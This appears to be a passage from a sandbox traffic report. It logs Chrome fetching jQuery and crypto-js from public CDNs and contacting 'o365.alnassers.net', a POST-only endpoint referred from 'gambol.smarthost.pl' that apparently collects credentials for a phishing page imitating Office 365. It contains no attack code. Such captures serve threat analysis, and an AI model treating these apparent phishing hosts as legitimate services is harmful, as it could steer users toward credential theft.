                                                                                      Data Ascii: teOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:functio
                                                                                      2024-11-15 17:09:11 UTC1369INData Raw: 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56
                                                                                      Data Ascii: 64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUV
                                                                                      2024-11-15 17:09:11 UTC1369INData Raw: 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73
                                                                                      Data Ascii: t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._has
                                                                                      2024-11-15 17:09:11 UTC1369INData Raw: 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c
                                                                                      Data Ascii: m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.1662653151.101.194.1374437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:11 UTC625OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                      Host: code.jquery.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:11 UTC610INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 89501
                                                                                      Server: nginx
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                      ETag: "28feccc0-15d9d"
                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Fri, 15 Nov 2024 17:09:11 GMT
                                                                                      Age: 2707413
                                                                                      X-Served-By: cache-lga21931-LGA, cache-dfw-kdfw8210156-DFW
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2, 1
                                                                                      X-Timer: S1731690552.609814,VS0,VE1
                                                                                      Vary: Accept-Encoding
                                                                                      2024-11-15 17:09:11 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                      2024-11-15 17:09:11 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                      2024-11-15 17:09:12 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                      2024-11-15 17:09:12 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                      2024-11-15 17:09:12 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                      2024-11-15 17:09:12 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.1662651147.79.74.1764437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:11 UTC342OUTGET / HTTP/1.1
                                                                                      Host: o365.alnassers.net
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:11 UTC345INHTTP/1.1 405 Method Not Allowed
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Fri, 15 Nov 2024 17:09:11 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 40
                                                                                      Connection: close
                                                                                      Allow: POST, OPTIONS
                                                                                      X-Frame-Options: DENY
                                                                                      Vary: Cookie, origin
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Referrer-Policy: same-origin
                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                      2024-11-15 17:09:11 UTC40INData Raw: 7b 22 64 65 74 61 69 6c 22 3a 22 4d 65 74 68 6f 64 20 5c 22 47 45 54 5c 22 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 2e 22 7d
                                                                                      Data Ascii: {"detail":"Method \"GET\" not allowed."}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.1662654104.17.25.144437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:12 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                      Host: cdnjs.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:13 UTC959INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:12 GMT
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: public, max-age=30672000
                                                                                      ETag: W/"61182885-40eb"
                                                                                      Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Timing-Allow-Origin: *
                                                                                      X-Content-Type-Options: nosniff
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 83590
                                                                                      Expires: Wed, 05 Nov 2025 17:09:12 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3KqyJ2dGZ%2FrdIymWOaMJ6cMojf9Ai%2BKdAkXV5uZqcfMN3ewyzD7yv14Gd3DF2PJECjxqQTcZVpCwix4fc0a5xgJflpXJ6bRZtoFJB0wgyEmPG%2BDe3Oyuw7Ht5ZAyqRR%2FPwAmUYKb"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d9028cc20ba7-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:13 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                      Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                                      Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                                      Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                                      Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                                      2024-11-15 17:09:13 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                                      Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
